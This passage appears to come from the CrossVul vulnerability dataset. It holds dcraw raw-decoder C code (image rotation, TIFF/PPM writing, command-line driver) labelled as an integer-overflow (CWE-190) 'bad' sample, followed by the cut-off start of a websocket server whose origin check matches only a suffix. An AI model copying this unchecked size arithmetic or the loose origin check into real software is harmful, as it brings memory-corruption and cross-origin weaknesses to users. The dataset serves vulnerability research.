out[0] = out[1] = out[2] = 0;
FORCC {
out[0] += out_cam[0][c] * img[c];
out[1] += out_cam[1][c] * img[c];
out[2] += out_cam[2][c] * img[c];
}
FORC3 img[c] = CLIP((int) out[c]);
}
else if (document_mode)
img[0] = img[fcol(row,col)];
FORCC histogram[c][img[c] >> 3]++;
}
#endif
if (colors == 4 && output_color) colors = 3;
#ifndef LIBRAW_LIBRARY_BUILD
if (document_mode && filters) colors = 1;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,1,2);
#endif
}
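/* Fuji Super CCD sensors place photosites on a grid rotated 45 degrees;
   resample that diagonal grid onto a rectangular one with bilinear
   interpolation (step = sqrt(0.5)). */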
void CLASS fuji_rotate()
{
int i, row, col;
double step;
float r, c, fr, fc;
unsigned ur, uc;
ushort wide, high, (*img)[4], (*pix)[4];
if (!fuji_width) return;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Rotating image 45 degrees...\n"));
#endif
fuji_width = (fuji_width - 1 + shrink) >> shrink;
step = sqrt(0.5);
wide = fuji_width / step;
high = (height - fuji_width) / step;
img = (ushort (*)[4]) calloc (high, wide*sizeof *img);
merror (img, "fuji_rotate()");
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,0,2);
#endif
for (row=0; row < high; row++)
for (col=0; col < wide; col++) {
ur = r = fuji_width + (row-col)*step;
uc = c = (row+col)*step;
if (ur > height-2 || uc > width-2) continue;
fr = r - ur;
fc = c - uc;
pix = image + ur*width + uc;
for (i=0; i < colors; i++)
img[row*wide+col][i] =
(pix[ 0][i]*(1-fc) + pix[ 1][i]*fc) * (1-fr) +
(pix[width][i]*(1-fc) + pix[width+1][i]*fc) * fr;
}
free (image);
width = wide;
height = high;
image = img;
fuji_width = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,1,2);
#endif
}
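/* Correct non-square pixels: stretch rows (pixel_aspect < 1) or columns
   (pixel_aspect > 1) by linear interpolation between adjacent lines. */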
void CLASS stretch()
{
ushort newdim, (*img)[4], *pix0, *pix1;
int row, col, c;
double rc, frac;
if (pixel_aspect == 1) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,0,2);
#endif
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Stretching the image...\n"));
#endif
if (pixel_aspect < 1) {
newdim = height / pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (width, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=row=0; row < newdim; row++, rc+=pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c*width];
if (c+1 < height) pix1 += width*4;
for (col=0; col < width; col++, pix0+=4, pix1+=4)
FORCC img[row*width+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
height = newdim;
} else {
newdim = width * pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (height, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=col=0; col < newdim; col++, rc+=1/pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c];
if (c+1 < width) pix1 += 4;
for (row=0; row < height; row++, pix0+=width*4, pix1+=width*4)
FORCC img[row*newdim+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
width = newdim;
}
free (image);
image = img;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,1,2);
#endif
}
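/* Map an output-space (row,col) to an index into the unflipped image:
   flip bit 4 transposes, bit 2 mirrors vertically, bit 1 mirrors
   horizontally. */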
int CLASS flip_index (int row, int col)
{
if (flip & 4) SWAP(row,col);
if (flip & 2) row = iheight - 1 - row;
if (flip & 1) col = iwidth - 1 - col;
return row * iwidth + col;
}
//@end COMMON
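/* Fixed-layout TIFF header written in front of TIFF output and EXIF
   thumbnails: a primary IFD plus small EXIF and GPS sub-IFDs, followed
   by the rational values and strings the tags point at. */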
struct tiff_tag {
ushort tag, type;
int count;
union { char c[4]; short s[2]; int i; } val;
};
struct tiff_hdr {
ushort t_order, magic;
int ifd;
ushort pad, ntag;
struct tiff_tag tag[23];
int nextifd;
ushort pad2, nexif;
struct tiff_tag exif[4];
ushort pad3, ngps;
struct tiff_tag gpst[10];
short bps[4];
int rat[10];
unsigned gps[26];
char t_desc[512], t_make[64], t_model[64], soft[32], date[20], t_artist[64];
};
//@out COMMON
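/* Append one directory entry to the tag array whose counter precedes it
   (*ntag). String lengths are recomputed with strnlen(); values that fit
   in four bytes are stored inline, larger ones keep 'val' as an offset. */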
void CLASS tiff_set (struct tiff_hdr *th, ushort *ntag,
ushort tag, ushort type, int count, int val)
{
struct tiff_tag *tt;
int c;
tt = (struct tiff_tag *)(ntag+1) + (*ntag)++;
tt->val.i = val;
if (type == 1 && count <= 4)
FORC(4) tt->val.c[c] = val >> (c << 3);
else if (type == 2) {
count = strnlen((char *)th + val, count-1) + 1;
if (count <= 4)
FORC(4) tt->val.c[c] = ((char *)th)[val+c];
} else if (type == 3 && count <= 2)
FORC(2) tt->val.s[c] = val >> (c << 4);
tt->count = count;
tt->type = type;
tt->tag = tag;
}
#define TOFF(ptr) ((char *)(&(ptr)) - (char *)th)
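/* TOFF() yields the byte offset of a header member, used as the value
   offset of out-of-line tags. tiff_head() fills the whole header:
   geometry and strip tags in "full" mode, an Orientation tag otherwise,
   plus resolution, software, date, artist, EXIF exposure data and GPS
   fields when present. */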
void CLASS tiff_head (struct tiff_hdr *th, int full)
{
int c, psize=0;
struct tm *t;
memset (th, 0, sizeof *th);
th->t_order = htonl(0x4d4d4949) >> 16;
th->magic = 42;
th->ifd = 10;
th->rat[0] = th->rat[2] = 300;
th->rat[1] = th->rat[3] = 1;
FORC(6) th->rat[4+c] = 1000000;
th->rat[4] *= shutter;
th->rat[6] *= aperture;
th->rat[8] *= focal_len;
strncpy (th->t_desc, desc, 512);
strncpy (th->t_make, make, 64);
strncpy (th->t_model, model, 64);
strcpy (th->soft, "dcraw v" DCRAW_VERSION);
t = localtime (&timestamp);
sprintf (th->date, "%04d:%02d:%02d %02d:%02d:%02d",
t->tm_year+1900,t->tm_mon+1,t->tm_mday,t->tm_hour,t->tm_min,t->tm_sec);
strncpy (th->t_artist, artist, 64);
if (full) {
tiff_set (th, &th->ntag, 254, 4, 1, 0);
tiff_set (th, &th->ntag, 256, 4, 1, width);
tiff_set (th, &th->ntag, 257, 4, 1, height);
tiff_set (th, &th->ntag, 258, 3, colors, output_bps);
if (colors > 2)
th->tag[th->ntag-1].val.i = TOFF(th->bps);
FORC4 th->bps[c] = output_bps;
tiff_set (th, &th->ntag, 259, 3, 1, 1);
tiff_set (th, &th->ntag, 262, 3, 1, 1 + (colors > 1));
}
tiff_set (th, &th->ntag, 270, 2, 512, TOFF(th->t_desc));
tiff_set (th, &th->ntag, 271, 2, 64, TOFF(th->t_make));
tiff_set (th, &th->ntag, 272, 2, 64, TOFF(th->t_model));
if (full) {
if (oprof) psize = ntohl(oprof[0]);
tiff_set (th, &th->ntag, 273, 4, 1, sizeof *th + psize);
tiff_set (th, &th->ntag, 277, 3, 1, colors);
tiff_set (th, &th->ntag, 278, 4, 1, height);
tiff_set (th, &th->ntag, 279, 4, 1, height*width*colors*output_bps/8);
} else
tiff_set (th, &th->ntag, 274, 3, 1, "12435867"[flip]-'0');
tiff_set (th, &th->ntag, 282, 5, 1, TOFF(th->rat[0]));
tiff_set (th, &th->ntag, 283, 5, 1, TOFF(th->rat[2]));
tiff_set (th, &th->ntag, 284, 3, 1, 1);
tiff_set (th, &th->ntag, 296, 3, 1, 2);
tiff_set (th, &th->ntag, 305, 2, 32, TOFF(th->soft));
tiff_set (th, &th->ntag, 306, 2, 20, TOFF(th->date));
tiff_set (th, &th->ntag, 315, 2, 64, TOFF(th->t_artist));
tiff_set (th, &th->ntag, 34665, 4, 1, TOFF(th->nexif));
if (psize) tiff_set (th, &th->ntag, 34675, 7, psize, sizeof *th);
tiff_set (th, &th->nexif, 33434, 5, 1, TOFF(th->rat[4]));
tiff_set (th, &th->nexif, 33437, 5, 1, TOFF(th->rat[6]));
tiff_set (th, &th->nexif, 34855, 3, 1, iso_speed);
tiff_set (th, &th->nexif, 37386, 5, 1, TOFF(th->rat[8]));
if (gpsdata[1]) {
tiff_set (th, &th->ntag, 34853, 4, 1, TOFF(th->ngps));
tiff_set (th, &th->ngps, 0, 1, 4, 0x202);
tiff_set (th, &th->ngps, 1, 2, 2, gpsdata[29]);
tiff_set (th, &th->ngps, 2, 5, 3, TOFF(th->gps[0]));
tiff_set (th, &th->ngps, 3, 2, 2, gpsdata[30]);
tiff_set (th, &th->ngps, 4, 5, 3, TOFF(th->gps[6]));
tiff_set (th, &th->ngps, 5, 1, 1, gpsdata[31]);
tiff_set (th, &th->ngps, 6, 5, 1, TOFF(th->gps[18]));
tiff_set (th, &th->ngps, 7, 5, 3, TOFF(th->gps[12]));
tiff_set (th, &th->ngps, 18, 2, 12, TOFF(th->gps[20]));
tiff_set (th, &th->ngps, 29, 2, 12, TOFF(th->gps[23]));
memcpy (th->gps, gpsdata, sizeof th->gps);
}
}
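/* Copy the embedded JPEG thumbnail to the output, inserting a minimal
   EXIF/TIFF header when the thumbnail does not already carry one. */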
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS jpeg_thumb_writer (FILE *tfp,char *t_humb,int t_humb_length)
{
ushort exif[5];
struct tiff_hdr th;
fputc (0xff, tfp);
fputc (0xd8, tfp);
if (strcmp (t_humb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, tfp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, tfp);
}
fwrite (t_humb+2, 1, t_humb_length-2, tfp);
}
void CLASS jpeg_thumb()
{
char *thumb;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
jpeg_thumb_writer(ofp,thumb,thumb_length);
free (thumb);
}
#else
void CLASS jpeg_thumb()
{
char *thumb;
ushort exif[5];
struct tiff_hdr th;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
fputc (0xff, ofp);
fputc (0xd8, ofp);
if (strcmp (thumb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, ofp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, ofp);
}
fwrite (thumb+2, 1, thumb_length-2, ofp);
free (thumb);
}
#endif
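/* Write the final image as PPM/PAM or TIFF. Unless auto-brightening is
   disabled, the white point is taken from the 99th percentile of the
   histogram (auto_bright_thr in the LibRaw build); rows are emitted in
   flip order, byte-swapping 16-bit PNM data on little-endian hosts. */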
void CLASS write_ppm_tiff()
{
struct tiff_hdr th;
uchar *ppm;
ushort *ppm2;
int c, row, col, soff, rstep, cstep;
int perc, val, total, t_white=0x2000;
#ifdef LIBRAW_LIBRARY_BUILD
perc = width * height * auto_bright_thr;
#else
perc = width * height * 0.01; /* 99th percentile white level */
#endif
if (fuji_width) perc /= 2;
if (!((highlight & ~2) || no_auto_bright))
for (t_white=c=0; c < colors; c++) {
for (val=0x2000, total=0; --val > 32; )
if ((total += histogram[c][val]) > perc) break;
if (t_white < val) t_white = val;
}
gamma_curve (gamm[0], gamm[1], 2, (t_white << 3)/bright);
iheight = height;
iwidth = width;
if (flip & 4) SWAP(height,width);
ppm = (uchar *) calloc (width, colors*output_bps/8);
ppm2 = (ushort *) ppm;
merror (ppm, "write_ppm_tiff()");
if (output_tiff) {
tiff_head (&th, 1);
fwrite (&th, sizeof th, 1, ofp);
if (oprof)
fwrite (oprof, ntohl(oprof[0]), 1, ofp);
} else if (colors > 3)
fprintf (ofp,
"P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\nTUPLTYPE %s\nENDHDR\n",
width, height, colors, (1 << output_bps)-1, cdesc);
else
fprintf (ofp, "P%d\n%d %d\n%d\n",
colors/2+5, width, height, (1 << output_bps)-1);
soff = flip_index (0, 0);
cstep = flip_index (0, 1) - soff;
rstep = flip_index (1, 0) - flip_index (0, width);
for (row=0; row < height; row++, soff += rstep) {
for (col=0; col < width; col++, soff += cstep)
if (output_bps == 8)
FORCC ppm [col*colors+c] = curve[image[soff][c]] >> 8;
else FORCC ppm2[col*colors+c] = curve[image[soff][c]];
if (output_bps == 16 && !output_tiff && htons(0x55aa) != 0x55aa)
swab ((char*)ppm2, (char*)ppm2, width*colors*2);
fwrite (ppm, colors*output_bps/8, width, ofp);
}
free (ppm);
}
//@end COMMON
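/* Stand-alone dcraw driver: parse command-line options, then for each
   file identify the format, decode and process the raw data, and write
   the result (image or thumbnail) to a file or to stdout. */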
int CLASS main (int argc, const char **argv)
{
int arg, status=0, quality, i, c;
int timestamp_only=0, thumbnail_only=0, identify_only=0;
int user_qual=-1, user_black=-1, user_sat=-1, user_flip=-1;
int use_fuji_rotate=1, write_to_stdout=0, read_from_stdin=0;
const char *sp, *bpfile=0, *dark_frame=0, *write_ext;
char opm, opt, *ofname, *cp;
struct utimbuf ut;
#ifndef NO_LCMS
const char *cam_profile=0, *out_profile=0;
#endif
#ifndef LOCALTIME
putenv ((char *) "TZ=UTC");
#endif
#ifdef LOCALEDIR
setlocale (LC_CTYPE, "");
setlocale (LC_MESSAGES, "");
bindtextdomain ("dcraw", LOCALEDIR);
textdomain ("dcraw");
#endif
if (argc == 1) {
printf(_("\nRaw photo decoder \"dcraw\" v%s"), DCRAW_VERSION);
printf(_("\nby Dave Coffin, dcoffin a cybercom o net\n"));
printf(_("\nUsage: %s [OPTION]... [FILE]...\n\n"), argv[0]);
puts(_("-v Print verbose messages"));
puts(_("-c Write image data to standard output"));
puts(_("-e Extract embedded thumbnail image"));
puts(_("-i Identify files without decoding them"));
puts(_("-i -v Identify files and show metadata"));
puts(_("-z Change file dates to camera timestamp"));
puts(_("-w Use camera white balance, if possible"));
puts(_("-a Average the whole image for white balance"));
puts(_("-A <x y w h> Average a grey box for white balance"));
puts(_("-r <r g b g> Set custom white balance"));
puts(_("+M/-M Use/don't use an embedded color matrix"));
puts(_("-C <r b> Correct chromatic aberration"));
puts(_("-P <file> Fix the dead pixels listed in this file"));
puts(_("-K <file> Subtract dark frame (16-bit raw PGM)"));
puts(_("-k <num> Set the darkness level"));
puts(_("-S <num> Set the saturation level"));
puts(_("-n <num> Set threshold for wavelet denoising"));
puts(_("-H [0-9] Highlight mode (0=clip, 1=unclip, 2=blend, 3+=rebuild)"));
puts(_("-t [0-7] Flip image (0=none, 3=180, 5=90CCW, 6=90CW)"));
puts(_("-o [0-5] Output colorspace (raw,sRGB,Adobe,Wide,ProPhoto,XYZ)"));
#ifndef NO_LCMS
puts(_("-o <file> Apply output ICC profile from file"));
puts(_("-p <file> Apply camera ICC profile from file or \"embed\""));
#endif
puts(_("-d Document mode (no color, no interpolation)"));
puts(_("-D Document mode without scaling (totally raw)"));
puts(_("-j Don't stretch or rotate raw pixels"));
puts(_("-W Don't automatically brighten the image"));
puts(_("-b <num> Adjust brightness (default = 1.0)"));
puts(_("-g <p ts> Set custom gamma curve (default = 2.222 4.5)"));
puts(_("-q [0-3] Set the interpolation quality"));
puts(_("-h Half-size color image (twice as fast as \"-q 0\")"));
puts(_("-f Interpolate RGGB as four colors"));
puts(_("-m <num> Apply a 3x3 median filter to R-G and B-G"));
puts(_("-s [0..N-1] Select one raw image or \"all\" from each file"));
puts(_("-6 Write 16-bit instead of 8-bit"));
puts(_("-4 Linear 16-bit, same as \"-6 -W -g 1 1\""));
puts(_("-T Write TIFF instead of PPM"));
puts("");
return 1;
}
argv[argc] = "";
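/* Accept options starting with '-' or '+' (for both, (c-2)|2 == '+').
   For options in "nbrkStqmHACg", the matching digit in "114111111422"
   gives how many numeric arguments must follow. */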
for (arg=1; (((opm = argv[arg][0]) - 2) | 2) == '+'; ) {
opt = argv[arg++][1];
if ((cp = (char *) strchr (sp="nbrkStqmHACg", opt)))
for (i=0; i < "114111111422"[cp-sp]-'0'; i++)
if (!isdigit(argv[arg+i][0])) {
fprintf (stderr,_("Non-numeric argument to \"-%c\"\n"), opt);
return 1;
}
switch (opt) {
case 'n': threshold = atof(argv[arg++]); break;
case 'b': bright = atof(argv[arg++]); break;
case 'r':
FORC4 user_mul[c] = atof(argv[arg++]); break;
case 'C': aber[0] = 1 / atof(argv[arg++]);
aber[2] = 1 / atof(argv[arg++]); break;
case 'g': gamm[0] = atof(argv[arg++]);
gamm[1] = atof(argv[arg++]);
if (gamm[0]) gamm[0] = 1/gamm[0]; break;
case 'k': user_black = atoi(argv[arg++]); break;
case 'S': user_sat = atoi(argv[arg++]); break;
case 't': user_flip = atoi(argv[arg++]); break;
case 'q': user_qual = atoi(argv[arg++]); break;
case 'm': med_passes = atoi(argv[arg++]); break;
case 'H': highlight = atoi(argv[arg++]); break;
case 's':
shot_select = abs(atoi(argv[arg]));
multi_out = !strcmp(argv[arg++],"all");
break;
case 'o':
if (isdigit(argv[arg][0]) && !argv[arg][1])
output_color = atoi(argv[arg++]);
#ifndef NO_LCMS
else out_profile = argv[arg++];
break;
case 'p': cam_profile = argv[arg++];
#endif
break;
case 'P': bpfile = argv[arg++]; break;
case 'K': dark_frame = argv[arg++]; break;
case 'z': timestamp_only = 1; break;
case 'e': thumbnail_only = 1; break;
case 'i': identify_only = 1; break;
case 'c': write_to_stdout = 1; break;
case 'v': verbose = 1; break;
case 'h': half_size = 1; break;
case 'f': four_color_rgb = 1; break;
case 'A': FORC4 greybox[c] = atoi(argv[arg++]);
case 'a': use_auto_wb = 1; break;
case 'w': use_camera_wb = 1; break;
case 'M': use_camera_matrix = 3 * (opm == '+'); break;
case 'I': read_from_stdin = 1; break;
case 'E': document_mode++;
case 'D': document_mode++;
case 'd': document_mode++;
case 'j': use_fuji_rotate = 0; break;
case 'W': no_auto_bright = 1; break;
case 'T': output_tiff = 1; break;
case '4': gamm[0] = gamm[1] =
no_auto_bright = 1;
case '6': output_bps = 16; break;
default:
fprintf (stderr,_("Unknown option \"-%c\".\n"), opt);
return 1;
}
}
if (arg == argc) {
fprintf (stderr,_("No files to process.\n"));
return 1;
}
if (write_to_stdout) {
if (isatty(1)) {
fprintf (stderr,_("Will not write an image to the terminal!\n"));
return 1;
}
#if defined(WIN32) || defined(DJGPP) || defined(__CYGWIN__)
if (setmode(1,O_BINARY) < 0) {
perror ("setmode()");
return 1;
}
#endif
}
for ( ; arg < argc; arg++) {
status = 1;
raw_image = 0;
image = 0;
oprof = 0;
meta_data = ofname = 0;
ofp = stdout;
if (setjmp (failure)) {
if (fileno(ifp) > 2) fclose(ifp);
if (fileno(ofp) > 2) fclose(ofp);
status = 1;
goto cleanup;
}
ifname = argv[arg];
if (!(ifp = fopen (ifname, "rb"))) {
perror (ifname);
continue;
}
status = (identify(),!is_raw);
if (user_flip >= 0)
flip = user_flip;
switch ((flip+3600) % 360) {
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6;
}
if (timestamp_only) {
if ((status = !timestamp))
fprintf (stderr,_("%s has no timestamp.\n"), ifname);
else if (identify_only)
printf ("%10ld%10d %s\n", (long) timestamp, shot_order, ifname);
else {
if (verbose)
fprintf (stderr,_("%s time set to %d.\n"), ifname, (int) timestamp);
ut.actime = ut.modtime = timestamp;
utime (ifname, &ut);
}
goto next;
}
write_fun = &CLASS write_ppm_tiff;
if (thumbnail_only) {
if ((status = !thumb_offset)) {
fprintf (stderr,_("%s has no thumbnail.\n"), ifname);
goto next;
} else if (thumb_load_raw) {
load_raw = thumb_load_raw;
data_offset = thumb_offset;
height = thumb_height;
width = thumb_width;
filters = 0;
colors = 3;
} else {
fseek (ifp, thumb_offset, SEEK_SET);
write_fun = write_thumb;
goto thumbnail;
}
}
if (load_raw == &CLASS kodak_ycbcr_load_raw) {
height += height & 1;
width += width & 1;
}
if (identify_only && verbose && make[0]) {
printf (_("\nFilename: %s\n"), ifname);
printf (_("Timestamp: %s"), ctime(&timestamp));
printf (_("Camera: %s %s\n"), make, model);
if (artist[0])
printf (_("Owner: %s\n"), artist);
if (dng_version) {
printf (_("DNG Version: "));
for (i=24; i >= 0; i -= 8)
printf ("%d%c", dng_version >> i & 255, i ? '.':'\n');
}
printf (_("ISO speed: %d\n"), (int) iso_speed);
printf (_("Shutter: "));
if (shutter > 0 && shutter < 1)
shutter = (printf ("1/"), 1 / shutter);
printf (_("%0.1f sec\n"), shutter);
printf (_("Aperture: f/%0.1f\n"), aperture);
printf (_("Focal length: %0.1f mm\n"), focal_len);
printf (_("Embedded ICC profile: %s\n"), profile_length ? _("yes"):_("no"));
printf (_("Number of raw images: %d\n"), is_raw);
if (pixel_aspect != 1)
printf (_("Pixel Aspect Ratio: %0.6f\n"), pixel_aspect);
if (thumb_offset)
printf (_("Thumb size: %4d x %d\n"), thumb_width, thumb_height);
printf (_("Full size: %4d x %d\n"), raw_width, raw_height);
} else if (!is_raw)
fprintf (stderr,_("Cannot decode file %s\n"), ifname);
if (!is_raw) goto next;
shrink = filters && (half_size || (!identify_only &&
(threshold || aber[0] != 1 || aber[2] != 1)));
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (identify_only) {
if (verbose) {
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (use_fuji_rotate) {
if (fuji_width) {
fuji_width = (fuji_width - 1 + shrink) >> shrink;
iwidth = fuji_width / sqrt(0.5);
iheight = (iheight - fuji_width) / sqrt(0.5);
} else {
if (pixel_aspect < 1) iheight = iheight / pixel_aspect + 0.5;
if (pixel_aspect > 1) iwidth = iwidth * pixel_aspect + 0.5;
}
}
if (flip & 4)
SWAP(iheight,iwidth);
printf (_("Image size: %4d x %d\n"), width, height);
printf (_("Output size: %4d x %d\n"), iwidth, iheight);
printf (_("Raw colors: %d"), colors);
if (filters) {
int fhigh = 2, fwide = 2;
if ((filters ^ (filters >> 8)) & 0xff) fhigh = 4;
if ((filters ^ (filters >> 16)) & 0xffff) fhigh = 8;
if (filters == 1) fhigh = fwide = 16;
if (filters == 9) fhigh = fwide = 6;
printf (_("\nFilter pattern: "));
for (i=0; i < fhigh; i++)
for (c = i && putchar('/') && 0; c < fwide; c++)
putchar (cdesc[fcol(i,c)]);
}
printf (_("\nDaylight multipliers:"));
FORCC printf (" %f", pre_mul[c]);
if (cam_mul[0] > 0) {
printf (_("\nCamera multipliers:"));
FORC4 printf (" %f", cam_mul[c]);
}
putchar ('\n');
} else
printf (_("%s is a %s %s image.\n"), ifname, make, model);
next:
fclose(ifp);
continue;
}
if (meta_length) {
meta_data = (char *) malloc (meta_length);
merror (meta_data, "main()");
}
if (filters || colors == 1) {
raw_image = (ushort *) calloc ((raw_height+7), raw_width*2);
merror (raw_image, "main()");
} else {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
}
if (verbose)
fprintf (stderr,_("Loading %s %s image from %s ...\n"),
make, model, ifname);
if (shot_select >= is_raw)
fprintf (stderr,_("%s: \"-s %d\" requests a nonexistent image!\n"),
ifname, shot_select);
fseeko (ifp, data_offset, SEEK_SET);
if (raw_image && read_from_stdin)
fread (raw_image, 2, raw_height*raw_width, stdin);
else (*load_raw)();
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (raw_image) {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
crop_masked_pixels();
free (raw_image);
}
if (zero_is_bad) remove_zeroes();
bad_pixels (bpfile);
if (dark_frame) subtract (dark_frame);
quality = 2 + !fuji_width;
if (user_qual >= 0) quality = user_qual;
i = cblack[3];
FORC3 if (i > cblack[c]) i = cblack[c];
FORC4 cblack[c] -= i;
black += i;
i = cblack[6];
FORC (cblack[4] * cblack[5])
if (i > cblack[6+c]) i = cblack[6+c];
FORC (cblack[4] * cblack[5])
cblack[6+c] -= i;
black += i;
if (user_black >= 0) black = user_black;
FORC4 cblack[c] += black;
if (user_sat > 0) maximum = user_sat;
#ifdef COLORCHECK
colorcheck();
#endif
if (is_foveon) {
if (document_mode || load_raw == &CLASS foveon_dp_load_raw) {
for (i=0; i < height*width*4; i++)
if ((short) image[0][i] < 0) image[0][i] = 0;
} else foveon_interpolate();
} else if (document_mode < 2)
scale_colors();
pre_interpolate();
if (filters && !document_mode) {
if (quality == 0)
lin_interpolate();
else if (quality == 1 || colors > 3)
vng_interpolate();
else if (quality == 2 && filters > 1000)
ppg_interpolate();
else if (filters == 9)
xtrans_interpolate (quality*2-3);
else
ahd_interpolate();
}
if (mix_green)
for (colors=3, i=0; i < height*width; i++)
image[i][1] = (image[i][1] + image[i][3]) >> 1;
if (!is_foveon && colors == 3) median_filter();
if (!is_foveon && highlight == 2) blend_highlights();
if (!is_foveon && highlight > 2) recover_highlights();
if (use_fuji_rotate) fuji_rotate();
#ifndef NO_LCMS
if (cam_profile) apply_profile (cam_profile, out_profile);
#endif
convert_to_rgb();
if (use_fuji_rotate) stretch();
thumbnail:
if (write_fun == &CLASS jpeg_thumb)
write_ext = ".jpg";
else if (output_tiff && write_fun == &CLASS write_ppm_tiff)
write_ext = ".tiff";
else
write_ext = ".pgm\0.ppm\0.ppm\0.pam" + colors*5-5;
ofname = (char *) malloc (strlen(ifname) + 64);
merror (ofname, "main()");
if (write_to_stdout)
strcpy (ofname,_("standard output"));
else {
strcpy (ofname, ifname);
if ((cp = strrchr (ofname, '.'))) *cp = 0;
if (multi_out)
sprintf (ofname+strlen(ofname), "_%0*d",
snprintf(0,0,"%d",is_raw-1), shot_select);
if (thumbnail_only)
strcat (ofname, ".thumb");
strcat (ofname, write_ext);
ofp = fopen (ofname, "wb");
if (!ofp) {
status = 1;
perror (ofname);
goto cleanup;
}
}
if (verbose)
fprintf (stderr,_("Writing data to %s ...\n"), ofname);
(*write_fun)();
fclose(ifp);
if (ofp != stdout) fclose(ofp);
cleanup:
if (meta_data) free (meta_data);
if (ofname) free (ofname);
if (oprof) free (oprof);
if (image) free (image);
if (multi_out) {
if (++shot_select < is_raw) arg--;
else shot_select = 0;
}
}
return status;
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_582_0 |
crossvul-cpp_data_good_402_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
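/* is_good_origin() below is a plain suffix comparison: the Origin header is
accepted whenever its value ends with the configured svr->origin string. */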
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL || strlen(connection) > UT_WS_SVR_MAX_HEADER_SIZE)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
